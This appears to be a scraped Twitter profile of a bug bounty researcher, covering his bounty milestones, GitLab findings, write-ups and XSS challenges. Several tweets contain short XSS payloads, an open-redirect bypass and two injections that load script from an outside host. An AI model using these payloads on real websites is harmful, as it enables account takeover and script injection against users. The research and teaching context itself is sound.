Johan Carlsson @joaxcar Twitter profile

Pinned Tweet

Johan Carlsson

1 year

I joined @gregxsunday on his podcast a while back. Realized I did not have a tweet with it to “pin”. Here is that tweet. Good intro to what I am doing if someone is curious

From zero to 6-digit bug bounty earnings in 1 year - Johan Carlsson -...

📧 Subscribe to BBRE Premium: https://bbre.dev/premium✉️ Sign up for the mailing list: https://bbre.dev/nl📣 Follow me on Twitter: https://bbre.dev/tw📣 Foll...

www.youtube.com

2

16

136

Last Seen Profiles

@L1OWomens

@ClarkHila94520

@BlockEvolution

@kotetsu1gosha

@kamila79738

@DChemere59479

@SeoRu_29

@foulplay

@jilbocil

@siieulgi

@EiriOh

@KamilahA47388

@BreezieDin70882

@kaefer623

@AshFlexem_

@AmoretteDe82293

@bondagebunn1e

@FelicitaM95565

@le7hsa

@eceerkenn

@MUNCAT_TRX

@TaylorAzar17670

@maddo88651

@AshleyWalk31055

@kakubutsugirls

@JRocheal20529

@LakVongx

@fu_you_ka

@gentian74Angie

@swooyoun_

@Saisan134

@galery_basah10

@optometer_NFTT

@CorwinJama5115

@sudto_sueb77713

@sophana19837

Johan Carlsson

@joaxcar

2 years

Yesterday I made it into top 5 on @GitLab bug bounty program 🥳, at the same time crossing 100k in bounties from the same. Some people are asking me how to get started or where and what to look for. I thought I could share a practical guide if anyone care for a thread [1/6]

26

171

936

Johan Carlsson

@joaxcar

1 month

I did not believe I could check off more bucket list items this year. This bug proved me wrong. Found my first ever proper RCE using command injection (through code review), really happy about this one

24

12

664

Johan Carlsson

@joaxcar

2 years

Looks like this is the time to learn how to hunt for leaked GitLab tokens 👀

17

56

505

Johan Carlsson

@joaxcar

1 year

I have finally done my first proper bug write-up! This one is about a SOP bypass in Chrome (escalated to ATO) using the Navigation API. Hope someone finds it interesting. Feel free to leave me any comments; I want to improve on this!

CVE-2022-4908: SOP bypass in Chrome using Navigation API - Johan Carlsson

Last year, I discovered a Same-Origin Policy (SOP) bypass in Chrome that allowed an attacker to leak the full URLs of another window’s navigation history. While attacks could be conducted cross-ori...

joaxcar.com

9

113

505

Johan Carlsson

@joaxcar

9 months

Did a little writeup of the CSP bypass I reported to PortSwigger. It might be interesting to anyone who saw the disclosed report and wonders if CSP bypasses are the new ripe low-hanging fruit!

CSP bypass on PortSwigger.net using Google script resources - Johan Carlsson

Portswigger just disclosed a report of mine over on HackerOne. It’s an unusual report in that the issue reported is purely a CSP bypass. I thought that I could provide a bit of context to the report...

joaxcar.com

4

97

359

Johan Carlsson

@joaxcar

2 months

Finally 🥳

26

5

343

Johan Carlsson

@joaxcar

2 months

Can someone explain this

10

25

279

Johan Carlsson

@joaxcar

1 year

Small XSS challenge. Real life situation that I solved today. Should be pretty easy, but good practice if you are just getting into XSS or is trying to get away from copy pasting payloads

23

45

271

Johan Carlsson

@joaxcar

4 months

Everyone is raving about CSPT used as CSRF. Wy not celebrate that this was explained already in webapp hacker handbook?! See @PortSwigger blog from 2007: Also, lets bring back the name “On-site Request Forgery”

On-site request forgery

Request forgery is a familiar attack payload for exploiting stored XSS vulnerabilities. In the MySpace worm, Samy placed a script within his profile which caused any user viewing the profile to perfor

portswigger.net

6

41

271

Johan Carlsson

@joaxcar

8 months

Just dropped off my work computer at the office. From tomorrow I will do bug bounties full time for three months. After that evaluate if my mental health can cope with it.. Wish me good luck!

44

2

265

Johan Carlsson

@joaxcar

2 years

My first disclosure to reach 100 up-votes on @Hacker0x01 . Disclosures have been the number one learning resource for me, so to see people finding an interest in my own reports makes me happy! Also thanks @gitlab for allowing full disclosures, contributing to this great resource

6

21

258

Johan Carlsson

@joaxcar

2 months

Thanks for the great explanations for this. Apparently, URL parsing (at least in browsers) is supposed to strip out "newlines" AND tabs. So all of these will land on /b

Johan Carlsson

@joaxcar

2 months

Can someone explain this

10

25

279

4

30

197

Johan Carlsson

@joaxcar

3 months

I just dropped the kids off at school on the first day after summer break. I am officially starting my new career as a full-time bug bounty hunter. Now I just have to find those bugs.

21

1

169

Johan Carlsson

@joaxcar

2 years

Free online hacking course 🥳

publiclyDisclosed

@disclosedh1

2 years

GitLab disclosed a bug submitted by @wcbowling : - Bounty: $33,510 #hackerone #bugbounty

3

71

344

4

17

165

Johan Carlsson

@joaxcar

7 months

I have now done half of my three-month full-time hunting. Thought I could share some stats 25 submissions: 🟢1 resolved 🟠12 triaged 🔵6 pending 🟤6 dupes (2 self dupes) Tools used: 0 Scans run: 0 💰Economy: I paid my salary with that resolved one

14

3

163

Johan Carlsson

@joaxcar

2 years

Another amazing @fransrosen report to study! Guess the arkoselabs[.]com XSS impacted a lot more sites, but nice usage of it here on GitLab in chain to ATO

1-click account hijack for anyone using Google sign-in with Gitlab, due to response-type switch +...

HackerOne report #1566384 by fransrosen on 2022-05-12, assigned to GitLab Team: Report |

gitlab.com

1

33

164

Johan Carlsson

@joaxcar

11 months

Try to catch the XSS 🧐 Think this one is a bit harder, but feel free to prove me wrong! No answers in the comments, please

19

22

143

Johan Carlsson

@joaxcar

10 days

This sentiment is so far from my experience hacking. Expecting findings after just 8 hours? You know what I did the last 8 hours, tried to understand one simple functionality, a few lines of code. Did I find anything, no. Was it worth it, yes 😀

Ben Sadeghipour

@NahamSec

10 days

I have hacked for almost 8 hours today with 0 findings. Do I recommend it? no. Will I do it all over again tomorrow? Absolutely!

45

83

1K

8

14

153

Johan Carlsson

@joaxcar

1 year

Finally made it past 3000 reputation. The last 1k took a long time as I have had less time to hunt. For information 3k puts you at top 550 at @Hacker0x01 , and miles from top 100

11

1

134

Johan Carlsson

@joaxcar

6 months

What a gem of a deep dive in iframes! Need to dig up all your old posts @aszx87410 !

iframe and window.open magic

If you want to generate a new window on a webpage, there are probably only two options: one is to embed resources on the same page using tags such as iframe, embed, and object, and the other is to use

blog.huli.tw

3

22

136

Johan Carlsson

@joaxcar

2 months

I might be a bit less active the coming weeks, might miss a DM or two. The reason being the newest family member who decided to join us this weekend. Finally a proud father of four 🥳

27

0

124

Johan Carlsson

@joaxcar

1 year

After two years and more than 100 written reports, ranging from "self closed" to "high", I finally found my first Critical finding on GitLab's bounty program! A lot of luck but also persistence and grind. Checking one item off the bucket list

GitLab Critical Security Release: 16.3.4 and 16.2.7

Learn more about GitLab Critical Security Release: 16.3.4 and 16.2.7 for GitLab Community Edition (CE) and Enterprise Edition (EE).

about.gitlab.com

7

13

115

Johan Carlsson

@joaxcar

2 years

Nice bug! Don't really like this "its a third party tool" argument to lower the bounty, think the impact should be the measurement. Always good to look for mentions of this in the program scope

publiclyDisclosed

@disclosedh1

2 years

HackerOne disclosed a bug submitted by fransrosen: - Bounty: $500 #hackerone #bugbounty

0

26

117

7

9

113

Johan Carlsson

@joaxcar

2 years

Found a URI leak bypassing SOP in Firefox

1

11

111

Johan Carlsson

@joaxcar

11 months

I'm glad to see that quite a few people found this interesting! My solution (and the one that others found) goes like this: \"-alert(1)}})<!--

Johan Carlsson

@joaxcar

1 year

Small XSS challenge. Real life situation that I solved today. Should be pretty easy, but good practice if you are just getting into XSS or is trying to get away from copy pasting payloads

23

45

271

1

12

107

Johan Carlsson

@joaxcar

7 months

Two new DOM sinks to add to any sink list: setHTMLUnsafe parseHTMLUnsafe the first one might start to replace some instances of innerHTML. After Chrome 124 it works in all browsers

1

15

105

Johan Carlsson

@joaxcar

8 months

People in the community sending death threats to tool creators when they have issues with their tools!? really? I like this Rs0n guy, he is doing his own thing. Please respect anyone sharing FREE content, or GTFO

7

15

104

Johan Carlsson

@joaxcar

11 months

Finally, I had time to finish the writeup for the hoist challenges. Hope someone finds it valuable. Great job everyone who solved it!

Having fun with JavaScript hoisting

Writeup of three JavaScript challenges posted on Twitter during November/December of 2023

joaxcar.com

Johan Carlsson

@joaxcar

11 months

Try to catch the XSS 🧐 Think this one is a bit harder, but feel free to prove me wrong! No answers in the comments, please

19

22

143

8

23

103

Johan Carlsson

@joaxcar

11 months

Another XSS challenge. This one is a bit more contrived. Mission: 1. just pop alert 2. run arbitrary JS Don't write the solution in the thread!

4

15

99

Johan Carlsson

@joaxcar

3 months

Yey I was just awarded 60 internet points and zero dollars for a report to @msftsecresponse rated important. Some user interaction would give full access to victim account (such as reading emails). Reporting to MS has been a terrible experience

11

4

96

Johan Carlsson

@joaxcar

6 months

Finally, I found some time to write a write-up on this! Sorry for the delay. I hope it contains enough context to understand the quirks needed to solve the challenge. Might revisit the post if people have questions, so please DM me if you don't understand

Sandbox-iframe XSS challenge solution - Johan Carlsson

This is a writeup describing the solution to a small XSS challenge I posted on Twitter in May 2024

joaxcar.com

Johan Carlsson

@joaxcar

6 months

⛳️ Challenge time Was a while since I did one of these. Don't post solutions in the thread; send a DM! The flag is in the fragment of the URL. Pop an alert with the flag. Will patch unintended solutions as they drop in 😅

8

9

74

0

13

97

Johan Carlsson

@joaxcar

2 years

Finding a critical bug 5 mins before Friday dinner with my kids, gives mixed feelings. Destroy dinner by reporting asap or get duped, but with a happy family? Hard choice 🤷‍♂️

7

0

93

Johan Carlsson

@joaxcar

6 months

I got the honor to join the team at @ctbbpodcast for a chat about some fun bugs and my experience testing out full time bug bounties

Johan Carlsson - 3 Month Check-in on Full-time Bug Bounty. (Ep. 69)

Episode 69: In this episode of Critical Thinking - Bug Bounty Podcast we’re joined by Johan Carlsson to hear about some updates on his bug hunting journey. W...

www.youtube.com

4

8

90

Johan Carlsson

@joaxcar

9 months

Painful. This needs to be punished harder. It decreases the trust in platforms like H1 and in the long run could hurt opportunities for serious reporters

curl disclosed on HackerOne: Buffer Overflow Vulnerability in...

## Summary: Hello security team, Hope you are doing well :) I would like to report a potential security vulnerability in the WebSocket handling code of the curl library. The issue is related to...

hackerone.com

7

8

85

Johan Carlsson

@joaxcar

8 months

@G0LDEN_infosec @aszx87410 @terjanq @kevin_mizu @garethheyes are a good start. Gareths book, the three other have a lot of posts on blogs etc. Things like this

About This Series | Beyond XSS

As a software engineer, you must be familiar with information security. In your work projects, you may have gone through security audits, including static code scanning, vulnerability scanning, or...

aszx87410.github.io

2

29

89

Johan Carlsson

@joaxcar

6 months

Things are looking good for that last May salary 😀

8

0

88

Johan Carlsson

@joaxcar

1 year

This one was weird "we had a regression and many others reported it, so we will lower the bounty to 10%". I mean, either you have a vulnerability or you dont. Blaming regression was a new one..

publiclyDisclosed

@disclosedh1

1 year

Reddit disclosed a bug submitted by mrzheev: - Bounty: $500 #hackerone #bugbounty

0

12

53

13

7

86

Johan Carlsson

@joaxcar

7 months

Did something fun with this the other week. "Form clobbering"

4

8

85

Johan Carlsson

@joaxcar

4 months

Great post! Some other related research from 2012 where the escape chars can also act as no-ops to bypass WAF/filters

Sonar Research

@Sonar_Research

4 months

🔥 XSS on any website with missing charset information? 😳 Attackers may leverage the ISO-2022-JP character encoding to inject arbitrary JavaScript code into a website. Read more in our latest blog post: #appsec #security #vulnerability

7

210

614

4

12

81

Johan Carlsson

@joaxcar

11 months

What about x.y.z("test-INJECT") should not be too hard

Justin Gardner

@Rhynorater

1 year

Somebody asked me recently if you can exploit an XSS scenario like this: x.y(1,INJECT); where x and y are not defined. You cannot break out of the script tag, but you can break out of the function call. I tried everything I could think of to abuse error handling and hoisting

13

25

145

15

12

79

Johan Carlsson

@joaxcar

1 year

Finally made it to top three at @gitlab 's bounty program! 🥳 It's getting harder and harder to climb this ladder. Just need to double up to get that first place..

5

1

78

Johan Carlsson

@joaxcar

2 years

Some personal highlights 2022 on @gitlab : - Most valid reports in 2022 (22) - Made it to top 4 on leaderboard - 120k bounties - At least one valid report per month Great program, great team!

🦊 GitLab

@gitlab

2 years

🎉 Here's what a record-breaking Bug Bounty year looks like. 🤑 Awarded a total of $1,055,770 USD in bounties in 2022 📈 Received a total of 920 reports from 424 researchers 🔧 Resolved 158 valid reports and made 94 public

3

25

120

5

0

72

Johan Carlsson

@joaxcar

2 years

Another XSS in @GitLab . This one used an unsanitized URL for the payload, and a poorly sanitized HTML element to increase the impact probability. Delivered to the GitLab server by a spoofed ZenTao server.

publiclyDisclosed

@disclosedh1

2 years

GitLab disclosed a bug submitted by @joaxcar : - Bounty: $13,950 #hackerone #bugbounty

0

10

71

2

7

72

Johan Carlsson

@joaxcar

6 months

⛳️ Challenge time Was a while since I did one of these. Don't post solutions in the thread; send a DM! The flag is in the fragment of the URL. Pop an alert with the flag. Will patch unintended solutions as they drop in 😅

8

9

74

Johan Carlsson

@joaxcar

2 years

This report to GitLab by @ryotkak shows a great way to use the "dirty dance none happy path OAuth feature", discussed in @fransrosen 's blog post, to escalate a chain of open redirects to account takeover

Chaining multiple redirects allow an attacker to exfiltrate the access token of OAuth providers...

HackerOne report #1725190 by ryotak on 2022-10-07, assigned to @cmaxim:...

gitlab.com

1

19

73

Johan Carlsson

@joaxcar

2 years

Found a small issue in Grafana, the fix is out now in the latest release. CVE-2023-1387 Grafana uses the GitHub vulnerability reporting feature which is really nice to work with, putting some pressure on the big platforms out there 😊

Grafana security release: New versions of Grafana with security fixes for CVE-2023-28119 and...

Today we are releasing Grafana 9.5.1, 9.5.0, 9.4.9, 9.3.19, 9.2.17 and 8.5.24 which include important security fixes. If you are affected, we recommend that you install newly released versions.

grafana.com

2

10

73

Johan Carlsson

@joaxcar

2 years

Until recently I have taken zero notes and have to re-google everything all the time. The new me is using @GitLab to structure my research 😎 Thanks go out to @realArcherL , @dee__see , and @ajxchapman for amazing tips in

2

22

72

Johan Carlsson

@joaxcar

1 year

Here we go again! Still no sign of the 20% policy in the policy @Hacker0x01 😊. Clear rules are important, the guy here spent a lot of extra time working on this issue without info about the hidden rules..

publiclyDisclosed

@disclosedh1

1 year

HackerOne disclosed a bug submitted by @lotus_619 : - Bounty: $1,576 #hackerone #bugbounty

5

15

86

2

4

68

Johan Carlsson

@joaxcar

3 months

If you want to get better at client side JS hacking, this is what you have been waiting for!

Justin Gardner

@Rhynorater

3 months

Just recorded a BANGER of a 2hr @ctbbpodcast episode with @MtnBer . He prepped super well for the pod and dropped a shit ton of great tips. My fav was a 🤯 new technique for exploiting selfXSS utilizing cookies' path attribute, cookie jar overflow, and a common redirect gadget.

7

19

170

2

5

68

Johan Carlsson

@joaxcar

1 year

There are some good and common ways to gain redirects, like "@" and "." but I have also had a lot of success with "//". A lot of simple filters check if the URL is "relative" by checking if it starts with a slash, forgetting that //attacker[.]com is not relative.

Critical Thinking - Bug Bounty Podcast

@ctbbpodcast

1 year

Freaking good redirect validation bypass payload: http://attacker[.]com\@test[.]com The backslash will be normalized to a slash by the browser and result in the OR. I see this issue a lot. (Obviously [.] is not a part of the payload, it prevents X from turning it into a link)

3

23

174

1

8

67

Johan Carlsson

@joaxcar

9 months

I spent quite some time on this challenge bu @kevin_mizu . Ended up finding a new jQuery CSPP gadget using $().on() event creation Did a writeup on the process of finding the gadget 👇

Hunting for Prototype Pollution gadgets in jQuery (intigriti 0124 challenge) - Johan Carlsson

This post summarizes what I learned from spending way too much time on the Intigriti January 2024 challenge created by Kevin Mizu. The challenge made for a great exercise using prototype pollution as...

joaxcar.com

Kévin - Mizu

@kevin_mizu

9 months

Challenge time is now over ⏰ TL;DR - HTML injection - Axios DOM Based CSPP - Axios CSPP response overwrite gadget - jQuery DOM Clobbering + CSPP selector overwrite gadgets - Setting src attr to "javascript:" for each HTML node ➝ XSS Detailed writeup 👇

0

13

79

1

12

66

Johan Carlsson

@joaxcar

2 years

1-click XSS to ATO rated as LOW severity... glad I am not doing bug bounties full time 🙃

7

1

65

Johan Carlsson

@joaxcar

19 days

👀 crazy bug. Nice find whoever found it

Security Bug Aggregator

@BugsAggregator

19 days

Sandbox escape from extensions due to insufficent checks in chrome.devtools.inspectedWindow.reload and chrome://policy (reward: $20000)

1

24

137

1

7

63

Johan Carlsson

@joaxcar

1 month

A friend of mine wrote this nice little post about putting a website on the internet. Its basic knowledge for a lot of people, but quite a few developers still lack these fundamentals. I really liked the concept and execution here, thanks @c_r_holm

3

12

59

Johan Carlsson

@joaxcar

2 years

Got the third place in Sweden by one point this year 🥳. Have not focused on quantity, and the point system is a bit weird. Still fun gamification though!

6

0

58

Johan Carlsson

@joaxcar

2 years

The easiest way to find out what to look for is the latest security release. See what others are finding at the moment, usually there are more bugs of the same type present [2/6]

GitLab Critical Security Release: 15.3.2, 15.2.4 and 15.1.6

Learn more about GitLab Critical Security Release: 15.3.2, 15.2.4 and 15.1.6 for GitLab Community Edition (CE) and Enterprise Edition (EE).

about.gitlab.com

1

5

56

Johan Carlsson

@joaxcar

2 years

Great talk by @spaceraccoonsec outlining how to approach the changing landscape of bug-bounty/infosec. The point about plateauing in skill level by getting stuck finding and reporting similar bugs really resonated with me.

Hackers are Shifting Left, Too - Closing Note by Eugene (Spaceracco...

Hackers are Shifting Left, Too - Closing Note by Eugene (Spaceraccoonsec) #shiftleft #infosec #bugbounty #conference #cybersecurity #pentesting #security

www.youtube.com

0

16

57

Johan Carlsson

@joaxcar

5 months

I started doing a short summary post on my first three months of full-time bug bounty hunting. What is more interesting 1. Free-flowing thoughts and feelings? 2. Hard stats? (3. actually posting the post without aiming for "perfection")

12

0

57

Johan Carlsson

@joaxcar

1 year

This is sad as I did not get to use my fun "hidden payload" in userinfo. The second one is still working though! Also, note that userinfo stays in the URL on relative links!|

Gareth Heyes \u2028

@garethheyes

1 year

My current fav XSS has gone 😢 <script>location.protocol='javascript'</script> No longer works 👎

6

8

70

2

56

Johan Carlsson

@joaxcar

2 years

A program on HackerOne have asked me for about 10 retests, without using the paid retest feature. After some days I have now gotten "any update sir" requests on them, the tables have turned! 😊

3

0

55

Johan Carlsson

@joaxcar

8 months

Great post by @garethheyes . I have used the form trick multiple times. I also find it strange that does not include it in their "safe example" (or as a warning). This could be one of the reasons why it's so often overlooked

PortSwigger

@PortSwigger

8 months

Are CSP's getting in the way of scoring that Bug Bounty you have been working on? 😫 Lucky for you, our research team ( @PortSwiggerRes ) has released some new techniques using Form Hijacking to bypass that protection and get you hacking again; enjoy!

2

61

234

1

6

56

Johan Carlsson

@joaxcar

1 year

Tweet explained 1. reportError is "new" as of Chrome 95 2. It only takes 1 argument. The second arg here is just an inline assignment 3. You need the = before alert as the string produced by the error is "Uncaught <payload>" and eval needs valid syntax Nice one! Fun to dig into

PortSwigger Research

@PortSwiggerRes

1 year

The new reportError() function enables a quite amusing XSS vector:

3

48

322

5

4

55

Johan Carlsson

@joaxcar

1 year

A bit of an older interview, but wow this was gold! Thanks @NahamSec and @spaceraccoonsec for sharing (years ago)

@spaceraccoonsec talks about Hacker101, bug bounty checklists,...

Live Every Tuesday, Saturday, and Sunday on Twitch:https://twitch.tv/nahamsecSignup for HackerOne: https://nahamsec.stream/HackerOneSignup for Hacker101: htt...

www.youtube.com

1

11

55

Johan Carlsson

@joaxcar

2 years

Found a duplicate high severity bug on @GoogleVRP . Will nevertheless count it as my first valid bug on their program 🥳 Getting that duplicate email is not a great feeling, but it at least shows that finding Google bugs are not out of reach

2

1

52

Johan Carlsson

@joaxcar

2 years

Interesting write-up about a blockchain bug. Scoring 1M$ in bounty. Key takeaway after reading: It's all about domain knowledge! The same goes for all programs, there are tons of "simple" bugs that you can only find if you know the domain.

Could Wrapped Tokens Like WETH Be (forced) Insolvent?

People are joking around the seeming depegging of WETH. The wrapped ETH token contract, the most simple and fundamental contract in the Ethereum ecosystem, is used in almost every DeFi protocol. If...

pwning.mirror.xyz

2

6

53

Johan Carlsson

@joaxcar

2 years

Must admit, I did not know what this Hackvertor thing by @garethheyes was all about. After watching this video, I will not be able to live without it! 🙇‍♂️

SecuriTEA & Crumpets - Episode 6 - Gareth Heyes - Hackvertor

SecuriTEA & Crumpets is a series where security professionals come together to talk about their background, research, and interesting topics. The sixth episo...

www.youtube.com

1

6

52

Johan Carlsson

@joaxcar

2 years

Another HTML injection, resulting in arbitrary POST requests as victim user. In worst case getting admin access to the GitLab instance. Payload delivered through Jira integration

publiclyDisclosed

@disclosedh1

2 years

GitLab disclosed a bug submitted by @joaxcar : - Bounty: $8,690 #hackerone #bugbounty

0

6

45

2

7

52

Johan Carlsson

@joaxcar

7 months

So what's up with this JSONP throwing the "bad callback error" to get executed by the bad callback 🙃

7

6

52

Johan Carlsson

@joaxcar

6 months

Finally got another payout! I can now pay my salary for April as well 😅

Johan Carlsson

@joaxcar

7 months

@joernchen no, I have only had to pay myself for one month so far. The next one is due in a week. Let's pray for some more payouts! (on a serious note, I had the economy for all months from the get-go and would not have done this otherwise). But it did pay more than my day job

1

0

4

2

51

Johan Carlsson

@joaxcar

11 months

Time for a solution here. ");import"//nj.rs"//

Johan Carlsson

@joaxcar

11 months

What about x.y.z("test-INJECT") should not be too hard

15

12

79

3

6

49

Johan Carlsson

@joaxcar

8 months

From what I can see this is just an UI bug. I would recommend @Hacker0x01 to fix this promptly as a lot of people are getting confused and making allegations against triagers (tip: dont!). The dupe is same program (all the time) @jobertabma #bugbountytip

1

49

Johan Carlsson

@joaxcar

2 years

Great read! Nice attack and great how they took the extra steps to put it into SqlMap

{JS-ON: Security-OFF}: Abusing JSON-Based SQL to Bypass WAF

Team82 developed a generic web application firewall bypass exploiting a lack of JSON syntax support in leading vendors' SQL injection like AWS and Imperva WAF.

claroty.com

1

12

48

Johan Carlsson

@joaxcar

2 years

Nice and clean XSS in GitLab. Worth noting here that the CSP bypass works for all scripts generated by other scripts decorated with a valid nonce. The trust is inherited. In this case jQuery is loaded with a nonce. Included scripts are a great place to look for CSP bypasses

yvvdwf

@yvvdwf

2 years

CSP-bypass using jQuery: if you see $(a).append(html), then try html="<script>alert(1)</script>" Example:

2

35

124

0

5

47

Johan Carlsson

@joaxcar

21 days

So Zendesk answer with a post blaming 1. The state of modern systems being interconnected 2. Customers not following “best practices” 3. The researcher “breaching trust” Good to know that Zendesk did NOTHING wrong here!

daniel

@hackermondev

21 days

Zendesk finally responded. Well, if you count a shady-looking GitHub account dropping a blog link as a response: They've doubled down, reaffirming their decision not to award a bounty, claiming I broke ethical guidelines by sharing the bug.

25

26

235

1

0

49

Johan Carlsson

@joaxcar

1 year

Let's keep the inspiration flowing. The last three could probably be done better, but I am quite happy with the pathname one.

Gareth Heyes \u2028

@garethheyes

1 year

Wait. What. Hehe. https://alert(1)@ example. com <a href=/ id=x>test</a> <script> eval(x.username) </script> Inspired by:

4

22

170

2

7

47

Johan Carlsson

@joaxcar

1 year

@garethheyes @Rhynorater @avlidienbrunn @jub0bs @LiveOverflow Hey thanks for inspiration! x.y(alert(1));function x(){}

4

5

46

Johan Carlsson

@joaxcar

2 years

This is what deep knowledge of your target can do for you while hunting for bugs! Another amazing escalation of a "trivial issue" by @wcbowling Getting at the @gitlab CTF flag

RepositoryPipeline allows importing of local git repos (#372165) · Issues · GitLab.org / GitLab ·...

HackerOne report #1685822 by vakzz on 2022-08-30, assigned to @dcouture:...

gitlab.com

0

6

47

Johan Carlsson

@joaxcar

6 months

Guess this is me trying to adhere to the old saying "If you're the smartest person in the room, you are in the wrong room" This time I was certainly in the right room 😅. An honor watching masters at work

Kévin - Mizu

@kevin_mizu

6 months

It was fun looking for bugs with @ryotkak , @hash_kitten , @joaxcar , @TheGrandPew and @IcesFont 😁 As always, thanks to @cure53berlin for the reactivity 🙏 2/2

4

0

25

0

1

46

Johan Carlsson

@joaxcar

11 months

I spend a lot of time playing with quirks in JavaScript. They are often great for hacking. But there is also a case to be made for learning how things are meant to be used. I found this course by Dan Abramov very insightful and highly recommend it:

Just JavaScript

Just JavaScript will help you develop a rock-solid understanding of how JavaScript works through intuitive visual explanations and learning challenges.

justjavascript.com

2

7

46

Johan Carlsson

@joaxcar

6 months

Turning 37 today. My mother sent me this. Child 1337 😎 (and no thats not my social security number st the bottom)

7

0

46

Johan Carlsson

@joaxcar

3 months

🤯

Matan Berson

@MtnBer

3 months

@joaxcar I’m pretty sure it does, you should probably still check that though just to make sure

0

2

3

5

45

Johan Carlsson

@joaxcar

4 months

Just to make clear, this is some great research! To important meta-takeaways 1. The usefulness of a vuln type might change over time. CSRF protections have made this one more important 2. Understand that CSPT is a means to an end. OSRF is one such end, but not the only one

Doyensec

@Doyensec

4 months

CSRF in modern web apps? It's still possible! Our latest research by @maxenceschmitt dives into using Client-Side Path Traversal to perform CSRF. Check out our latest blogpost and brand new #Burp extension for finding bugs. #doyensec #appsec #CSPT2CSRF

1

50

123

2

3

45

Johan Carlsson

@joaxcar

2 years

If I can control response headers on a service, which ones can be abused? Like "Set-Cookie" to set cookies on the domain, "Location" for redirects, and CORS headers to loosen restrictions. What more? The victim is the visitor, I control the response on the target domain. (no XSS)

13

2

43

Johan Carlsson

@joaxcar

2 years

Some follow up here [7/6] 1. ⚠️ Do not ever test DOS on gitlab[.]com or other production instances! Only self-hosted 2. Why DOS? It's arbitrary, the point is to find an area to focus on to not get analysis paralysis 3. This is how I started, but with a focus on GraphQL AC

3

43

Johan Carlsson

@joaxcar

2 years

If you follow these steps you will have learned a LOT about security, DOS issue, GitLab, setting up environments and replicating vulnerabilities. You will also most certainly be in a great position to finding your first bug on the GitLab @Hacker0x01 program. [6/6]

2

3

44

Johan Carlsson

@joaxcar

10 months

Managed to find my way into the 2023 @gitlab bounty highlights. Such a great program! Congrats to @yvvdwf for a well deserved “best report” again, and pwnie for a hard to contest “highest impact”

7

0

44

Johan Carlsson

@joaxcar

2 years

My twitter feed Musk: Trump! Andrew Tate: Maaaaan! Bots: Crypto! My mastodon feed Security researchers: long detailed informative posts Sorry but I only signed up here for infosec, will still check in here but will focus on @joaxcar @infosec .exchange

1

0

42

Johan Carlsson

@joaxcar

2 years

This report is a great example of the goldmine that @Hacker0x01 Hacktivity is. The report is a bit confusing, and it took a couple of tries to recreate based on the description. But I had never heard of the Service Worker API before, learning so much from this one!

publiclyDisclosed

@disclosedh1

2 years

GitLab disclosed a bug submitted by ehhthing: - Bounty: $1,680 #hackerone #bugbounty

0

9

18

0

4

43

Johan Carlsson

@joaxcar

6 months

I managed to take a proper vacation last week. Spending every waking hour in pool/sea with my kids. Did no hacking, and no writeup. Sorry about that to those who waited. I can promise a solution post tomorrow when I am back to work 🏖️

Johan Carlsson

@joaxcar

6 months

Great job everyone who solved this so far! Only intended solutions this time 😄 I will release the solution on Sunday

2

0

14

1

0

42

Johan Carlsson

@joaxcar

11 months

Another great post on hoisting by @brutelogic ! Missed this one when doing my own research. Interestingly the payload from my post work on the second example (undefined2.php) without hijacking atob %27-alert(1));function%20myObj(){}//

Brute Logic

@BRuteLogic

11 months

A good technique to deal with JSi based undefined scenarios. #XSS

1

19

71

2

5

39

Johan Carlsson

@joaxcar

1 year

@renniepak @0xH4rmony <script/src="//0-a%2enl"></script> 34 chars, browsers are nice enough to correct the missing space

3

6

41

Johan Carlsson

@joaxcar

2 years

Not the most advanced bug, but a good one to look for. I have found multiple instances of this in multiple programs. The bug type is also covered in

Top 10 web hacking techniques of 2022

Welcome to the Top 10 Web Hacking Techniques of 2022, the 16th edition of our annual community-powered effort to identify the most important and innovative web security research published in the last

portswigger.net

Bug Bounty Reports Explained

@gregxsunday

2 years

We all know path traversals. But did you hear about a client-side path traversal? There are few resources about this bug class so many hackers don't check for it. Don't be one of them! Start by watching my explanation of @joaxcar 's $6,580 bug in GitLab!

3

28

134

0

9

40

Johan Carlsson

@joaxcar

8 months

This was fun. I disagree with most of it, but still some valid points. They are correct in what they point out is a bad approach to BB, but the idea that they would know everything about an application after one engagement?! well i respectfully disagree

Episode 79: Bug Bounties

In this episode of The Cyber Threat Perspective, Brad and Darrius delve into the world of bug bounties, discussing the pros and cons of integrating bug bount...

www.youtube.com

1

3

41

Johan Carlsson

@joaxcar

22 days

Great finding, highlighting some of the big issues in BB regarding disclosure policies. I think H1 need to sharpen the rules around OOS and Informational reports. The reporter here helped secure a lot of companies and that should be the end goal

daniel

@hackermondev

22 days

1 Bug, $50K+ in bounties: how Zendesk left a backdoor in hundreds of companies #bugbountytips

79

315

1K

0

2

39

Johan Carlsson

@joaxcar

2 years

For us living in the DevTools console my life is going to become so much smoother! Going to use on monday: $_ monitor(foo) getEventListeners($0) queryObjects(Promise)

How to speed up your workflow with Console shortcuts #DevToolsTips

Use the shortcuts provided by the Console Utilities API to quickly refer to recent elements, query objects, monitor events and function calls, and more.Learn...

www.youtube.com

1

5

40

Johan Carlsson

@joaxcar

2 years

Now go to the GitLab issue tracker and search for old DOS security issues. Read them all Then install any vulnerable version in a docker container and replicate some of the issues. Try to recreate the ones from 15.3.2 [4/6]

Issues · GitLab.org / GitLab · GitLab

GitLab is an open source end-to-end software development platform with built-in version control, issue tracking, code review, CI/CD, and more. Self-host GitLab on your own servers, in a...

gitlab.com

1

4

40

Johan Carlsson

@joaxcar

2 years

In 15.3.2 there were five DOS bugs, all given a medium severity. DOS bugs like these are present in almost every GitLab security release lately. They are easy enough to replicate, and one can hunt for them both statically and dynamically. [3/6]

1

3

38

Johan Carlsson

@joaxcar

11 months

It may be too soon for another challenge, but I needed to get this out before posting a write-up about a WebKit mime sniffing bug. Let's see if you can find some unintended solutions here. I guess there could exist a few. Mission: XSS 🤷‍♂️

1

10

39

Johan Carlsson

@joaxcar

2 years

@IM_23pds It's fake, the writeup is just a rewrite of this one and is also not getting it right. The bug is not in Grafana, it was in Aiven. Don't know why anyone would do this

Aiven Ltd disclosed on HackerOne: Grafana RCE via SMTP server...

## Summary: This report is similar to [#1180653](https://hackerone.com/reports/1180653), except with different parameter injection entrypoint. SMTP server password configuration setting accepts...

hackerone.com

6

3

39